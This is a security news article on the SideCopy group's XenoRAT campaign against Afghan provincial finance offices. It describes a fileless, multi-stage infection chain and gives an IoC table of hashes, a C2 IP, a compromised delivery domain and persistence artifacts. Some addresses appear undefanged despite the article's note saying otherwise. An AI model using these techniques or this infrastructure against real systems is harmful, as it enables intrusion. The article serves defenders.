A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT.
The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats — regional revenue and finance directorates that form the fiscal backbone of the country.
The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto — the dominant language used by Afghan government workers.
The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, showing that the attackers had precise knowledge of their targets’ working environment.
Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence.
SideCopy operates under the broader Transparent Tribe, also known as APT36, umbrella — a group with a documented history of targeting South Asian government institutions.
Seqrite Labs has been tracking this threat cluster for years as part of its global spear phishing monitoring program.
Once the victim opened the shortcut file, the malware silently used mshta.exe — a legitimate Windows utility — to reach out to a compromised Afghan education domain and pull a remote payload.
This technique is called Living-off-the-Land, where attackers abuse built-in system tools to avoid triggering security alerts. The malware then decoded obfuscated JavaScript in memory and embedded itself in the Windows Registry, disguising its persistence entry as a Microsoft Edge process.
The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a bulletproof server in Frankfurt, Germany.
This command-and-control infrastructure was entirely separate from the delivery domain — a deliberate design to ensure long-term access even if the delivery layer was discovered and shut down.
SideCopy Hackers Deploy Persistent XenoRAT Malware
The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website.
That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.
That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.
The shellcode that followed used reflective loading — allocating executable memory and injecting itself without writing the main payload to disk. This fileless approach makes the malware far harder to catch with conventional antivirus scanning.
XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
The malware runs a mutex called “clouda” to prevent duplicate instances, and it queries installed antivirus products before reporting back to its operators.
Persistence Mechanisms and Infrastructure Exposure
The decoy document dropped during execution was a real Afghan Ministry of Finance internal staff directory, listing Finance Directors, Revenue Chiefs, and Secretaries from all 34 provinces — complete with mobile numbers.
This level of detail indicates the attackers conducted prior intelligence gathering, likely through earlier compromises of Afghan government networks.
The delivery domain abimj.edu.af resolved to IPs 103.132.98.224 and 103.132.98.226, both on a subnet belonging to Afghanistan’s own Ministry of Communication.
Staging malicious payloads on local Afghan infrastructure allowed traffic to blend with legitimate government communications, bypassing network monitoring tools.
The RAT’s C2 server at 185.235.137.106 was hosted on AS59711, a Bulgaria-registered provider with Frankfurt data center presence previously linked to SideCopy activity.
Security teams should monitor for unusual mshta.exe executions, unexpected Registry Run keys mimicking Windows processes, and outbound traffic to unrecognized European hosting providers.
Enforcing application allow-listing, auditing scheduled tasks regularly, and restricting HTA execution from public directories are effective mitigations. Seqrite released detections under signatures including Link.Downloader.50744.GC and Script.Netloader.50745.GC to help identify compromised systems.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| SHA256 | 194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14 | ZIP archive (initial delivery) |
| SHA256 | 3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01 | Malicious LNK file |
| SHA256 | DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB | Decoy PDF document |
| SHA256 | A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67 | ugayt.hta payload |
| SHA256 | 5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45 | noway.bat (persistence batch file) |
| SHA256 | 99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D | zuidrt.hta (Stage-2 HTA payload) |
| SHA256 | 8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A | WayBroad.dll (Stage-1 Loader DLL) |
| SHA256 | 0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772 | Aotestpass.dll (Stage-2 Loader DLL) |
| SHA256 | 9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14 | XenoRAT final payload |
| IP Address | 185.235.137.106 | XenoRAT C2 server (HZ Hosting, Frankfurt) |
| IP Address | 103.132.98.224 | Delivery domain resolved IP (Afghan MoCIT) |
| IP Address | 103.132.98.226 | Delivery domain resolved IP (Afghan MoCIT) |
| Domain | abimj.edu.af | Compromised Afghan education domain used for payload delivery |
| URL | hxxp://abimj.edu.af/index.php | Stage-1 remote HTA/PHP payload endpoint |
| URL | hxxp://abimj.edu.af/institute/cloudiyaf/document.pdf | Decoy PDF download URL |
| URL | hxxps://abimj.edu.af/institute/10/ | Stage-2 payload download URL |
| URL | hxxps://abimj.edu.af/institute/7/ | Alternate Stage-2 URL (Windows 7 targets) |
| File Name | zuidrt.hta | Persistent HTA payload stored in Public folder |
| File Name | noway.bat | Hidden batch file for registry persistence execution |
| File Name | ayui.vmxx | Disguised encoded Stage-2 payload blob |
| File Name | ayhui.vmxx | Reconstructed intermediate shellcode container |
| Registry Key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run “Edgre” | Persistence Run key masquerading as Microsoft Edge |
| Mutex | clouda | XenoRAT single-instance mutex |
| Scheduled Task | XenoUpdateManager | Persistence scheduled task created by XenoRAT |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
